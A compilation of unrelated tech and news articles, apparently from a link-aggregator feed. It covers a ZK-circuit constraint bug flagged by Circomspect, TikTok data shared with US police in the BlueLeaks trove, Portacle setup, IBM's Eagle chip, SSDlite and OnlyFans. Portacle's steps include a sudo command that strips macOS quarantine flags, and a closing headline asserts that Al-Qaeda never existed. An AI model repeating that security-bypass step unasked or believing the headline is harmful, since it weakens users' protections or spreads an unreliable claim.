include range proofs for the input signals amount and total. However, during the rewrite we accidentally forget to include a constraint ensuring that the output from LessThan is 1. This means that users may be able to withdraw amounts that are greater than their total balance, which is obviously a serious vulnerability! There are examples (like Num2Bits) in which a template constrains its inputs and no further constraints on the outputs are required. However, forgetting to constrain the output from a template generally indicates a mistake and requires further review to determine whether it constitutes a vulnerability. Circomspect will flag locations where output signals are not constrained to ensure that each location can be manually checked for correctness. Let’s talk! We at Trail of Bits are excited about contributing to the growing range of tools and libraries for ZK that have emerged in the last few years. If you are building a project using ZK, we would love to talk to you to see if we can help in any way. If you are interested in having your code reviewed by us, or if you’re looking to outsource parts of the development to a trusted third party, please get in touch with our team of experienced cryptographers. Tl;dr: Trail of Bits has launched a practice focused on machine learning and artificial intelligence, bringing together safety and security methodologies to create a new risk assessment and assurance program. This program evaluates potential bespoke risks and determines the necessary safety and security measures for AI-based systems. If you’ve read any news over the past six months, you’re aware of the unbridled enthusiasm for artificial intelligence. The public has flocked to tools built on systems like GPT-3 and Stable Diffusion, captivated by how they alter our capacity to create and interact with each other. While these systems have amassed headlines, they constitute a small fraction of AI-based systems that are currently in use, powering technology that is influencing outcomes in all aspects of life, such as finance, healthcare, transportation and more. People are also attempting to shoehorn models like GPT-3 into their own applications, even though these models may introduce unintended risks or not be adequate for their desired results. Those risks will compound as the industry moves to multimodal models. With people in many fields trying to hop on the AI bandwagon, we are dealing with security and safety issues that have plagued the waves of innovation that have swept through society in the last 50 years. This includes issues such as proper risk identification and quantification, responsible and coordinated vulnerability disclosures, and safe deployment strategies. In the rush to embrace AI, the public is at a loss as to the full scope of its impact, and whether these systems are truly safe. Furthermore, the work seeking to map, measure, and mitigate against newfound risks has fallen short, due to the limitations and nuances that come with applying traditional measures to AI-based systems. The new ML/AI assurance practice at Trail of Bits aims to address these issues. With our forthcoming work, we not only want to ensure that AI systems have been accurately evaluated for potential risk and safety concerns, but we also want to establish a framework that auditors, developers and other stakeholders can use to better assess potential risks and required safety mitigations for AI-based systems. Further work will build evaluation benchmarks, particularly focused on cybersecurity, for future machine-learning models. We will approach the AI ecosystem with the same rigor that we are known to apply to other technological areas, and hope the services transform the way practitioners in this field work on a daily basis. In a paper released by Heidy Khlaaf, our engineering director of ML/AI assurance, we propose a novel, end-to-end AI risk framework that incorporates the concept of an Operational Design Domain (ODD), which can better outline the hazards and harms a system can potentially have. ODDs are a concept that has been used in the autonomous vehicle space, but we want to take it further: By having a framework that can be applied to all AI-based systems, we can better assess potential risks and required safety mitigations, no matter the application. We also discuss in the paper: When “safety” doesn’t mean safety: The AI community has conflated “requirements engineering” with “safety measures,” which is not the same thing. In fact, it’s often contradictory! The need for new measures: Risk assessment practices taken from other fields, i.e. hardware safety, don’t translate well to AI. There needs to be more done to uncover design issues that directly lead to systematic failures. When “safety” doesn’t mean “security”: The two terms are not interchangeable, and need to be assessed differently when applied to AI and ML systems. It hasn’t been all bad: The absence of well-defined operational boundaries for general AI and ML models has made it difficult to accurately assess the associated risks and safety, given the vast number of applications and potential hazards. We discuss what models can be adapted, specifically those that can ensure security and reliability. The AI community, and the general public, will suffer the same or worse consequences we’ve seen in the past if we cannot safeguard the systems the world is rushing to adopt. In order to do so, it’s essential to get on the same page when it comes to terminology and techniques for safety objectives and risk assessments. However, we don’t need to reinvent the wheel. Applicable techniques already exist; they just need to be adapted to the AI and machine-learning space. With both this paper and our practice’s forthcoming work, we hope to bring clarity and cohesion to AI assurance and safety, in the hope that it can counter the marketing hype and exaggerated commercial messaging in the current marketplace that deemphasizes the security of this burgeoning technology. This approach builds on our previous machine-learning work, and is just the beginning of our efforts in this domain. Any organizations interested in working with this team can contact Trail of Bits to inquire about future projects.
42
Leaked Documents Reveal What TikTok Shares with Authorities – IN the U.S.
President Donald Trump’s executive order banning Americans from using TikTok is driven by concerns that the company might hand over user data to Chinese authorities. Recently hacked police documents reveal the nature of the company’s relationship to law enforcement — not in China but in the United States. TikTok’s parent company, ByteDance, is headquartered in Beijing, where the government censors social media content and maintains other forms of influence over tech companies. But a glimpse at what TikTok does in the U.S. underscores that data privacy issues extend beyond China. Documents published in the BlueLeaks trove, which was hacked by someone claiming a connection to Anonymous and published by the transparency collective Distributed Denial of Secrets, show the information that TikTok shared with U.S. law enforcement in dozens of cases. Experts familiar with law enforcement requests say that what TikTok collects and hands over is not significantly more than what companies like Amazon, Facebook, or Google regularly provide, but that’s because U.S. tech companies collect and hand over a lot of information. ph3h3p The documents also reveal that two representatives with bytedance.com email addresses registered on the website of the Northern California Regional Intelligence Center, a fusion center that covers the Silicon Valley area. And they show that the Federal Bureau of Investigation and Department of Homeland Security actively monitored TikTok for signs of unrest during the George Floyd protests. The number of requests for subscriber information that TikTok says it receives from law enforcement is significantly lower than what U.S. tech giants reportedly field, likely because police are more accustomed to using data from U.S. companies and apps in investigations. TikTok enumerates its requests from law enforcement in a biannual transparency report, the most recent of which says that for the last half of 2019, the company received 100 requests covering 107 accounts. It handed over information in 82 percent of cases. Facebook, by contrast, says it received a whopping 51,121 requests over the same period, and handed over at least some data in 88 percent of cases. A 2018 document found in BlueLeaks titled “Law Enforcement Technology Investigations Resource Guide” gives police details on how to obtain records from Musical.ly, which was acquired by ByteDance and merged into TikTok that year. In the releases shown in BlueLeaks, TikTok handed over multiple IP addresses, information about the devices used to register for accounts, cellphone numbers, and unique IDs tied to platforms including Instagram, Facebook, or Google if the user logged in using a social media account. (Business Insider first reported the specifics of what TikTok collects.) It is unclear whether these data releases were in response to warrants, subpoenas, or other requests, and the company would not give details, citing user privacy. All social media platforms are required by law to comply with valid court orders requesting user information, but what they actually provide can vary widely, said Ángel Díaz, an expert on national security and technology at the Brennan Center for Justice. Companies also have the right to challenge requests for user data in court — though they often don’t do so. The accounts for which TikTok handed over data in the BlueLeaks dump range from influencers with tens of thousands of followers to people who primarily post for friends. One user contacted by The Intercept said they were unaware that their information had been given to law enforcement. Díaz said that in certain emergency situations, where moderators have a good-faith belief that there is a threat to someone’s life or a risk of serious physical harm, tech companies may voluntarily turn over information to the U.S. government without notifying the user. TikTok restored access to the account after The Intercept asked the company about it. “We are committed to respecting the privacy and rights of our users when complying with law enforcement requests,” said TikTok spokesperson Jamie Favazza. “We carefully review valid law enforcement requests and require appropriate legal documents in order to produce information for a law enforcement request.” TikTok has tried to distance itself from its Chinese origins, hiring a former Disney executive as CEO, engaging lobbyists with ties to the Trump campaign, and pledging to add 10,000 positions in the United States. Some of that expansion is apparently coming in the area of cooperation with authorities. TikTok recently sought out a law enforcement response specialist and is currently recruiting a global law enforcement project manager. The team that reviews law enforcement requests is based in Los Angeles, Favazza said. The BlueLeaks documents also indicate that U.S. federal investigators and police — some of whom are themselves enthusiastic TikTok users — increasingly view the app as a useful tool. In the early days of the George Floyd protests, law enforcement used TikTok, along with Facebook, Twitter, and other social media apps, to track protests and dissent. An FBI report from June 2 titled “Civil Unrest May 2020 Situation Report” alleged that TikTok was among the apps being used to promote violence. “Reporting nationally indicates individuals are using traditional social medial platforms and encrypted messaging applications (YouTube, Facebook, Twitter, Instagram, TikTok, Telegram, Topbuzz.com, Snapchat, Wickr) to discuss potential acts of violence.” In lieu of actual examples of physical violence, the document pointed to the doxxing of officers, “rumors about false activities,” and, cryptically, “false reports of violence to incite violence.” Three days later, another FBI dispatch warned, “An identified user posted a video on TikTok demonstrating which tab to pull to quickly remove body armor of LEO/military, saying ‘do with this information what you will.’ The post was gaining significant traction.” One satirical TikTok video even got a dedicated intelligence report, from DHS’s Office of Intelligence and Analysis. On May 31, a 19-year-old TikTok user who goes by the handle weirdsappho posted a video riffing off a tweet that comedian Jaboukie Young-White, a correspondent for “The Daily Show,” wrote after the National Guard was deployed to Minneapolis. Young-White tweeted, “thank god they’re bringing in the army,” at a moment when anxiety about the deployment was running high. “I would be heartbroken if someone disabled a tank by putting water balloons filled w sticky liquids (esp some sort of sugar/milk/syrup combo) into a glass jar and throwing it at the windshield, rendering it inoperable support our troops.” In her video, weirdsappho included some of the replies to the tweet, which expanded on the joke. The DHS report reprised weirdsappho’s video, quoting the tweet and the replies verbatim, without explaining their source or giving context. The intelligence report bore the subject line “Social media video provides TTPs” — tactics, techniques, and procedures — “on how to interfere with the U.S. National Guard during riots,” suggesting that the teenager was an imminent threat. The existence of the dispatch was first reported by the online news site Mainer. In last week’s executive order, Trump cited concerns that TikTok’s ownership by ByteDance could “allow the Chinese Communist Party access to Americans’ personal and proprietary information.” TikTok’s track record, and ByteDance’s obligations under Chinese law, do present unique security concerns. The Chinese state has invested significant resources in using artificial intelligence to monitor and manipulate public opinion, and ByteDance has been brought along in that effort. ByteDance recently established a joint venture with a Chinese state media group, leaving open the possibility that some of its technology might be used for propaganda purposes. TikTok’s privacy policy states that the company may share user information with “a parent, subsidiary, or other affiliate of our corporate group.” Multiple class-action lawsuits have accused TikTok of sending data to China, though TikTok says that the data of U.S. users is stored in Virginia and backed up in Singapore. TikTok has also censored political speech that is disfavored by the Chinese government, including videos about the Hong Kong protests and about the internment in inhumane camps in northwestern China of Uyghurs, an oppressed Muslim minority group. Internal documents previously obtained by The Intercept show that TikTok instructed moderators to suppress posts created by users who were deemed poor, ugly, or disabled. The guides appeared to have been hastily translated from Chinese. “The common concern, whether we’re talking about TikTok or Huawei, isn’t the intentions of that company necessarily but the framework within which it operates,” said Elsa Kania, an expert on Chinese technology at the Center for a New American Security. “You could criticize American companies for having an opaque relationship to the U.S. government, but there definitely is a different character to the ecosystem.” At the same time, she added, the Trump administration’s actions, including a handling of Portland protests that brought to mind the police crackdown in Hong Kong, have undercut official critiques of Chinese practices: “At a moment when we’re seeing attempts by the administration to draw a contrast in terms of values and ideology with China, these eerie parallels that keep recurring do really undermine that.” Last week’s executive order takes effect 45 days after its issuance. Trump appears to favor ByteDance selling TikTok to an American owner, with Microsoft being the frontrunner. If that happens, some concerns about data privacy with regards to China might be eliminated. But the BlueLeaks documents highlight that without more restrictions in the United States on what companies can collect and hand over to investigators, there’s reason to worry about any social media platform, American or Chinese.
2
Portacle:A Portable Common Lisp Development Environment
Portacle is rather straight-forward to setup and use. All you need to do is extract an archive. After that, you can freely move its installation folder around and even take it with you on a memory stick. If you are new to Emacs, Lisp, or both, you should also read the section after this one once you successfully completed the installation. Windows Download the latest release and run it. It will ask you where to install it to, defaulting to your home folder. Note that you do not need to append portacle to the end of the path. After extraction, you can launch it by double-clicking the portacle.exe. Note that portacle.exe is tied to the portacle directory and needs everything within it to function properly. You can however create a shortcut to the exe to reach it more easily from your desktop. Mac OS X Download the latest release, open the disk image, and move the portacle folder to a dirctory such as /Applications for easy access. Due to "security" reasons on macOS, you'll then need to run sudo xattr -dr com.apple.quarantine /Applications/portacle (replace /Applications with whatever path you moved your portacle directory to) in order to remove the quarantine attribute from all files in the portacle directory. This will allow you to open the application without security warnings/confirmations. You may see several xattr: No such file errors, which can be safely ignored. Note that you cannot copy the Portacle.app outside of the portacle directory. You must take the whole directory with you. You can however drag the app into your dock to create a shortcut. Linux Download the latest release and extract it. You can then launch it by double-clicking portacle.desktop. The file may also be presented to you as just Portacle. Note that you cannot move or copy portacle.desktop elsewhere. It has to reside in the portacle directory for it to work.
4
IBM Quantum breaks the 100‑qubit processor barrier
Today, IBM Quantum unveiled Eagle, a 127-qubit quantum processor. Eagle is leading quantum computers into a new era — we’ve launched a quantum processor that has pushed us beyond the 100-qubit barrier. We anticipate that, with Eagle, our users will be able to explore uncharted computational territory — and experience a key milestone on the path towards practical quantum computation. We view Eagle as a step in a technological revolution in the history of computation. As quantum processors scale up, each additional qubit doubles the amount of space complexity — the amount of memory space required to execute algorithms — for a classical computer to reliably simulate quantum circuits. We hope to see quantum computers bring real-world benefits across fields as this increase in space complexity moves us into a realm beyond the abilities of classical computers. While this revolution plays out, we hope to continue sharing our best quantum hardware with the community early and often. This approach allows IBM and our users to work together to understand how best to explore and develop on these systems to achieve quantum advantage as soon as possible. Constructing a processor that breaks the hundred-qubit barrier wasn’t something we could do overnight. Scientists for decades have theorized that a computer based on the same mathematics followed by subatomic particles — quantum mechanics — could outperform classical computers at simulating nature. However, constructing one of these devices is an enormous challenge. Qubits can decohere — or forget their quantum information — with even the slightest nudge from the outside world. Producing Eagle on our short timeline was possible in part thanks to IBM’s legacy of pioneering new science and investing in core hardware technology, including processes for reliable semiconductor manufacturing and packaging and bringing nascent products to market. Eagle’s qubit count feat represents an important milestone on our IBM Quantum Roadmap. Eagle demonstrates how our team is solving challenges across hardware and software to eventually realize a quantum computer capable of solving practical problems in fields from renewable energy to finance and more. Quantum computation at scale IBM Quantum’s Eagle processors contain nearly twice the qubits of our 65-qubit Hummingbird processor — but building something bigger takes more work than adding more qubits. We had to combine and improve upon techniques developed in previous generations of IBM Quantum processors in order to develop a processor architecture, including advanced 3D packaging techniques that we’re confident can form the backbone of processors up to and including our planned 1,000+ qubit Condor processor. Eagle is based on our Heavy-hex represents the fourth iteration of the topology for IBM Quantum systems. Read more. heavy-hexagonal qubit layout as debuted with our Falcon processor, where qubits connect with either two or three neighbors as if sitting upon the edges and corners of tessellated hexagons. This particular connectivity decreased the potential for errors caused by interactions between neighboring qubits — providing significant boosts in yielding functional processors. Eagle also incorporates readout multiplexing as featured in our Hummingbird R2. Previous processors required a set of control and readout electronics for each qubit — this is manageable for a few dozen qubits, but would be far too bulky for 100+, let alone 1,000+ qubit processors. Readout multiplexing allows us to drastically reduce the amount of electronics and wiring required inside of the dilution refrigerator. Perhaps most importantly, Eagle incorporates past IBM expertise in classical processor fabrication to provide scalable access wiring to all qubits. What do we mean? Quantum processors require a tangle of wiring that we must route outward to their edges. However, 3D integration allows us to place particular microwave circuit components and wiring on multiple physical levels. While packaging qubits remains one of the largest challenges for future quantum computers, multi-level wiring and other components provide the techniques that make possible the path toward Condor, with minimal impact to individual qubits’ performance. There’s work yet to be done. The scale of a quantum chip is just one of three metrics that we use to measure the performance of a quantum processor, and we must continue to push the quality and speed of our processors by benchmarking their Quantum Volume and CLOPS is a metric correlated with how fast a quantum processor can execute circuits. Read more. Circuit Layer Operations Per Second (CLOPS) , respectively. A modular paradigm: IBM Quantum System Two As we continue scaling our chips, we expect them to mature beyond the infrastructure of IBM Quantum System One. Therefore, we’re excited to unveil a concept for the future of quantum computing systems: IBM Quantum System Two. Central to IBM Quantum System Two will be modularity. With this system, we’re giving flexibility to our hardware to continue to increase the scale of our chips. The team is taking a holistic systems approach to understand the necessary resources to support not only our upcoming Osprey and Condor processors, but also quantum processors into the future, as we continue to progress along our hardware roadmap. System Two introduces a new generation of scalable qubit control electronics together with higher-density cryogenic components and cabling. Furthermore, we are working jointly with Bluefors to re-imagine the cryogenic platform. Bluefors’ new cryogenic platform and its novel structural design optimizes space inside of the fridge in order to accommodate increased support hardware required by larger processors, while ensuring that engineers can easily access and service the hardware inside the fridge. This platform brings the possibility of providing a larger shared cryogenic workspace, opening the door to potential linking of quantum processors through novel interconnects. We think that System Two represents a glimpse into the future of what quantum computing looks like — a true quantum data center. Breaking the 100-qubit barrier is an incredible feat from the IBM Quantum team, and we’re looking forward to sharing Eagle and our other advances with the quantum computing community. There’s more to come as we progress along our IBM Quantum roadmap, from increases in the speed of our processors to pursuing quantum advantage — perhaps even quicker than expected — with the help of high-performance computing resources. We hope you’ll join us as we continue our journey, with the goal of scaling quantum computers into paradigm-shifting systems capable of solving some of the most pressing challenges the world faces today. Even grander things await.
17
Invisible Science: The Scientization of the Ordinary (2016)
Current Issue Back Issues Invisible Science The Scientization of the Ordinary Steven Shapin In Orbit, 2013, by Tomás Saraceno, installation view, Kunstsammlung Nordrhein-Westfalen,K21 Ständehaus, Düsseldorf; courtesy the artist; Tanya Bonakdar Gallery, New York; Andersen’sContemporary, Copenhagen; Pinksummer contemporary art, Genoa; Esther Schipper, Berlin; © photographby Tomás Saraceno, 2013. There’s a McDonald’s restaurant near where I live in Cambridge, Massachusetts. Roughly equidistant from Harvard and the Massachusetts Institute of Technology and close to one of the beating hearts of modern science and technology, the restaurant sits across Massachusetts Avenue from a nondescript building full of entrepreneurial electronic gaming companies. Walk a little toward the MIT end of the avenue, and you pass major institutes for bioinformatics and cancer research, at least a dozen pharmaceutical and biotech companies, outposts of Microsoft and Google, the Frank Gehry−designed Stata Center, which houses much of MIT’s artificial intelligence and computer science activities (with an office for Noam Chomsky), and several “workbars” and “coworking spaces” for start-up high-tech companies. You might think that this McDonald’s is well placed to feed the neighborhood’s scientists and engineers, but few of them actually eat there, perhaps convinced by sound scientific evidence that Big Macs aren’t good for them. (Far more popular among the scientists and techies is an innovative vegetarian restaurant across the street—styled as a “food lab”—founded, appropriately enough, by an MIT materials science and Harvard Business School graduate.) You might also assume that, while a lot of science happens at MIT and Harvard, and at the for-profit and nonprofit organizations clustered around the McDonald’s, the fast-food outlet itself has little or no significance for the place of science in late modern society. No scientists or engineers (that I know of) work there, and no scientific inquiry (that I am aware of) is going on there. And yet there is a sense in which such places are scientific sites, touching our lives in ways that bear comparison with the science that happens at places like Harvard and MIT. To read the full article online, please login to your account or subscribe to our digital edition ($25 yearly). Prefer print? Order back issues or subscribe to our print edition ($30 yearly). Reprinted from The Hedgehog Review 18.3 (Fall 2016). This essay may not be resold, reprinted, or redistributed for compensation of any kind without prior written permission. Please contact The Hedgehog Review for further details.
1
Everything You Need to Know About Torchvision’s SSDlite Implementation
In the previous article, we’ve discussed how the SSD algorithm works, covered its implementation details and presented its training process. If you have not read the previous blog post, I encourage you to check it out before continuing. In this part 2 of the series, we will focus on the mobile-friendly variant of SSD called SSDlite. Our plan is to first go through the main components of the algorithm highlighting the parts that differ from the original SSD, then discuss how the released model was trained and finally provide detailed benchmarks for all the new Object Detection models that we explored. The SSDlite is an adaptation of SSD which was first briefly introduced on the MobileNetV2 paper and later reused on the MobileNetV3 paper. Because the main focus of the two papers was to introduce novel CNN architectures, most of the implementation details of SSDlite were not clarified. Our code follows all the details presented on the two papers and where necessary fills the gaps from the official implementation. As noted before, the SSD is a family of models because one can configure it with different backbones (such as VGG, MobileNetV3 etc) and different Heads (such as using regular convolutions, separable convolutions etc). Thus many of the SSD components remain the same in SSDlite. Below we discuss only those that are different Following the Section 6.2 of the MobileNetV2 paper, SSDlite replaces the regular convolutions used on the original Heads with separable convolutions. Consequently, our implementation introduces new heads that use 3x3 Depthwise convolutions and 1x1 projections. Since all other components of the SSD method remain the same, to create an SSDlite model our implementation initializes the SSDlite head and passes it directly to the SSD constructor. Our implementation introduces a new class for building MobileNet feature extractors. Following the Section 6.3 of the MobileNetV3 paper, the backbone returns the output of the expansion layer of the Inverted Bottleneck block which has an output stride of 16 and the output of the layer just before the pooling which has an output stride of 32. Moreover, all extra blocks of the backbone are replaced with lightweight equivalents which use a 1x1 compression, a separable 3x3 convolution with stride 2 and a 1x1 expansion. Finally to ensure that the heads have enough prediction power even when small width multipliers are used, the minimum depth size of all convolutions is controlled by the min_depth hyperparameter. This section discusses the configuration of the provided SSDlite pre-trained model along with the training processes followed to replicate the paper results as closely as possible. All of the hyperparameters and scripts used to train the model on the COCO dataset can be found in our references folder. Here we discuss the most notable details of the training process. Though the papers don’t provide any information on the hyperparameters used for training the models (such as regularization, learning rate and the batch size), the parameters listed in the configuration files on the official repo were good starting points and using cross validation we adjusted them to their optimal values. All the above gave us a significant boost over the baseline SSD configuration. Key important difference of SSDlite comparing to SSD is that the backbone of the first has only a fraction of the weights of the latter. This is why in SSDlite, the Data Augmentation focuses more on making the model robust to objects of variable sizes than trying to avoid overfitting. Consequently, SSDlite uses only a subset of the SSD transformations and this way it avoids the over-regularization of the model. Due to the reliance on Data Augmentation to make the model robust to small and medium sized objects, we found that it is particularly beneficial for the training recipe to use large number of epochs. More specifically by using roughly 3x more epochs than SSD we are able to increase our precision by 4.2mAP points and by using a 6x multiplier we improve by 4.9mAP. Increasing further the epochs seems to yield diminishing returns and makes the training too slow and impractical, nevertheless based on the model configuration it seems that the authors of the paper used an equivalent 16x multiplier. A set of final optimizations that brought our implementation very close to the official one and helped us bridge the accuracy gap was training the backbone from scratch instead of initializing from ImageNet, adapting our weight initialization scheme, changing our Input Scaling and replacing all standard ReLUs added on the SSDlite heads with ReLU6. Note that since we trained the model from random weights, we additionally applied the speed optimization described on the paper of using a reduced tail on the backbone. Comparing the above implementation with the one on the official repo, we’ve identified a few differences. Most of them are minor and they are related to how we initialize the weights (for example Normal initialization vs Truncated Normal), how we parameterize the LR Scheduling (for example smaller vs larger warmup rate, shorter vs longer training) etc. The biggest known difference lies in the way we compute the Classification loss. More specifically the implementation of SSDlite with MobileNetV3 backbone on the official repo doesn’t use the SSD’s Multibox loss but instead uses RetinaNet’s focal loss. This is a rather significant deviation from the paper and since TorchVision already offers a full implementation of RetinaNet, we decided to implement SSDlite using the normal Multi-box SSD loss. As discussed in previous articles, reproducing research papers and porting them to code is not a journey of monotonically increasing accuracies, especially in cases where the full training and implementation details are not known. Typically the process involves lots of backtracking as one needs to identify those implementation details and parameters that have significant impact on the accuracy from those that don’t. Below we try to visualize the most important iterations that improved our accuracy from the baseline: The order of optimizations presented above is accurate, though a bit idealized in some cases. For example, though different schedulers were tested during the Hyperparameter tuning phase, none of them provided significant improvements and thus we maintained the MultiStepLR which was used in the baseline. Nevertheless while later experimenting with different LR Schemes, we found it beneficial to switch to CosineAnnealingLR, as it required less configuration. Consequently, we believe that the main takeaway from the above summary should be that even by starting with a correct implementation and a set of optimal hyperparams from a model of the same family, there is always accuracy points to be found by optimizing the training recipe and tuning the implementation. Admittedly the above is a rather extreme case where the accuracy doubled, but still in many cases there is a large number of optimizations that can help us push the accuracy significantly. Here is how to initialize the two pre-trained models: ssdlite = torchvision . models . detection . ssdlite320_mobilenet_v3_large ( pretrained = True ) ssd = torchvision . models . detection . ssd300_vgg16 ( pretrained = True ) Below are the benchmarks between the new and selected previous detection models: As we can see, the SSDlite320 MobileNetV3-Large model is by far the fastest and smallest model and thus it’s an excellent candidate for real-world mobile applications. Though its accuracy is lower than the pre-trained low-resolution Faster R-CNN equivalent, the SSDlite framework is adaptable and one can boost its accuracy by introducing heavier heads with more convolutions. On the other hand, the SSD300 VGG16 model is rather slow and less accurate. This is mainly because of its VGG16 backbone. Though extremely important and influential, the VGG architecture is nowadays quite outdated. Thus though the specific model has historical and research value and hence it’s included in TorchVision, we recommend to users who want high-resolution detectors for real world applications to either combine SSD with alternative backbones (see this example on how to create one) or use one of the Faster R-CNN pre-trained models. We hope you enjoyed the 2nd and final part of the SSD series. We are looking forward to your feedback.
18
The Internet Is for Porn
span before . Enjoy! One of the biggest and most interesting things happening in the consumer web right now is running almost completely under the radar. It has virtually zero Silicon Valley involvement. There are no boastful VCs getting rich. It is utterly absent from tech’s plethora of twitters, fora and media (at least, as they say, “on main”). Indeed, the true extent of its incredible success has gone almost completely unnoticed, even by its many, many, many customers. I’m talking, of course, about OnlyFans. OnlyFans, the content subscription service that has come to be dominated by sex workers, has only been around since 2016. It works a bit like Instagram-meets-Patreon, or perhaps Twitch - for porn. Users pay to follow content creators and unlock exclusive material. The applications to porn are pretty obvious, and unlike its more prudish cousins, OnlyFans has openly embraced adult content creators. “OF” gives creators an array of tools for monetizing their audiences, with not only different subscription tiers, but ways to allow paying customers to directly interact with creators. OnlyFans was already growing steadily before COVID, but the platform has absolutely exploded during the pandemic in a manner of “hypergrowth” fantasy. According to their CEO , they were adding nearly 200,000 new users and 8,000 new content creators a day back in May, and have only continued to grow since . The platform now has north of 700,000 content creators (!) serving a customer base of over 50 million registered users (!!). Hard stats are hard to come by, but one figure pegged the cumulative total paid out to creators at $725 million as of May. Cardi B joined the platform in May. In short, OnlyFans is for real. It’s becoming not just the next generation of porn, but it might just represent a quantum leap in fixing one of the world’s most popular industries. And Silicon Valley has almost nothing to do with it. The reasons why are worth reflecting on. Let me stop here and say: if you’re uncomfortable with pornography, it’s better to just stop reading right here. I am unashamed to be a casual porn consumer. In this, I am extremely normal. Volumes of research show that nearly all men - old and young, married and single, straight, gay and everywhere along the spectrum - consume porn on occasion. While a majority of porn consumers are men, a huge number of women are watching, too. Pornhub reports that about a third of its American audience are women. Giggles, eye-rolls and the occasional moral scold aside, porn is a gigantic industry that serves an equally enormous popular demand. The cavernous disparity between the demonstrably massive popularity of porn and our popular unwillingness to even acknowledge it exists is a truly bizarre facet of American puritanical culture. While the oft-cited stat that porn is a third of all internet traffic is probably a myth, search engine companies say it represents about 10-15% of all queries. That’s a lot! Pornhub alone received about 120 million unique visitors a day even before COVID forced everyone indoors. By comparison, CNN reported a record-breaking 148 million uniques in the month of January. (Fox News had only 104 million.) No one’s quite sure how large the entire porn industry is, but it’s safely assumed to be in the $5 billion range at least - around a third the size of the global video game industry. In other words, porn is a huge, popular and extremely mainstream industry - which people insist on not talking about and enjoying in private. (Or maybe in a private browser window.) The porn industry itself has long been famously problematic. Like many industries that rely on talent that is often young and naive, greedy middlemen (almost always men) who control production and channels of distribution take all the upside for themselves. A perfect example is porn mega-name Mia Khalifa, who was paid a grand total of $12,000 for only a handful of shoots - a tiny, tiny fraction of the value her content has generated for distributors like Pornhub. Free porn sites - Pornhub chief among them - have done to the porn industry what Facebook and Google did to ad-supported media. By aggregating demand for “free” porn, they vacuumed up all the ad revenue that had once kept studios and distributors (not to mention the stars) in business while demolishing any reason to pay for their content. You can buy a subscription to sites like Pornhub, of course, but that doesn’t really solve the problem; it’s a bit like buying a subscription to Facebook to read the newspaper. While some porn actors/actresses have been able to build personal brands to monetize their content, this is an extremely difficult process. For sex workers must not only face all the normal challenges to creating unique identities online, but they must do it with an openly hostile Silicon Valley fighting them at every step. That isn’t hyperbole. At almost every turn, the tech industry has gone out of its way to penalize, marginalize and - yes - “cancel” sex workers, the overwhelming majority of whom are women responding to ravenous male demand. PayPal , Venmo , Stripe, Square and almost every other payments service shuts down their accounts. Twitter shadowbans them while Tumblr , Instagram and Snapchat either over-enforce rules or ban adult content accounts entirely. The Big Blue App, of course, doesn’t permit adult content at all - and neither does Apple or Google’s App Stores. An observer might note that all of these companies are dominated by men, in an industry dominated by men, tightly interwoven with a venture capital industry that is super-dominated by men. So it’s curious why none of these men have shown any interest in addressing the massive and lucrative sex work industry that overwhelmingly serves, well, men; until you consider who pays the real costs of that industry’s brokenness: women. Would more women in positions of power in Silicon Valley’s tech giants and top VC firms ever have funded an OnlyFans service or its like? It’s hard to say. The cultural taboos around porn are powerful - so powerful that they’ve kept an American redoubt of hyper-capitalism from even sniffing at a gigantic industry badly in need of innovation. Also, part of the sexist constructs of femininity that women operate in include ideas of purity and moral rectitude that might have discouraged them from even broaching the topic. Or maybe not. We don’t really know. Here’s what we do know: plenty of the men who have waged war on sex workers’ livelihoods from positions of enormous power in tech also consume porn and even personally hire those same sex workers. Yet when you combine American prudishness with the tech industry’s obsession with polishing mostly-male personal brands, the Valley’s refusal to consider legitimate sex worker needs becomes easier to understand. It’s unlikely that the engineers, product managers and executives who made those product decisions that upended sex workers’ lives ever understood, or perhaps even considered, their impacts. Or if they did, it seems that sex workers are considered expendable users. (Again, at least in public.) This has created a large digital underclass of sex workers - including, but far from limited to, adult performers - who live in fear of being banned by the big tech platforms while simply doing their jobs. The vast majority are women serving a heterosexual male audience. Most of them do nothing illegal at all, but they operate in the long shadow of those powerful (and powerfully sexist) cultural taboos and their resulting hypocritical popularity. It would not have taken a market strategy genius to spot an opening for OnlyFans here: a high-quality digital platform where adult performers can capture the lion’s share of value for their own content. And indeed, there have been other similar attempts to do this (again, ignored by mainstream tech). But what OnlyFans figured out was that to pry open consumers’ willingness to pay for porn again, they needed to offer exclusive content and the ability to interact with performers, as well as a way for creators to brand-build on their platform. The popular performer Aella , who makes something on the order of $100,000 a month on OnlyFans , discussed some of her specific monetization strategies in this fascinating (and SFW) interview: OnlyFans’ 20% cut of its creators’ revenues might be most usefully compared to Patreon’s 10% take-rate. Despite that big bite (which OnlyFans says really amounts to 12% after merchant fees and processing), OnlyFans has nevertheless scaled to roughly three-quarters of a billion in payouts in not quite 4 years, with no evident external funding. (OnlyFans is not even listed on Crunchbase). By contrast, it took Patreon 6 years , and $166 million (!) in venture funding, to reach $1 billion from 4 million “patrons.” Which of these two companies sounds more successful? To be sure, OnlyFans is not perfect. They are dealing with growth pains like subscriber churn, spam, creators who have trouble getting their payouts and a back tax problem. There are also the usual creator discovery problems that almost all influencer platforms encounter. It can be difficult for adult performers in particular to market themselves, given the strict rules about their content on many social platforms discussed above. Nevertheless, OnlyFans has distinguished itself not only by helping a very large number of sex workers make an honest living, but by treating them like first-class citizens rather than a scourge. In doing so, it’s not only saving the porn industry, but demonstrating how to make it a better, safer and more equitable place by aligning incentives for consumers and creators. The breakout success of OnlyFans is laudable, but should prompt some soul-searching in the power centers of Silicon Valley. Why did it take this long? Why would no one else have the courage to address sex work? Why does the same industry that exalts such morally ruinous firms as Palantir, Facebook and Palmer Lucky’s actual next-gen weapons startup get queasy about consenting adults wanting to see naked bodies? And if they missed this market opportunity, think about how many more are out there - invisible only to the affluent men who run “tech.” span Insights blog (SFW) is chock-full of incredible insights about global porn interests that their analytics team puts together. Yes, people are searching for “coronavirus porn”.
1
Al-Qaeda does not and never has existed says the BBC
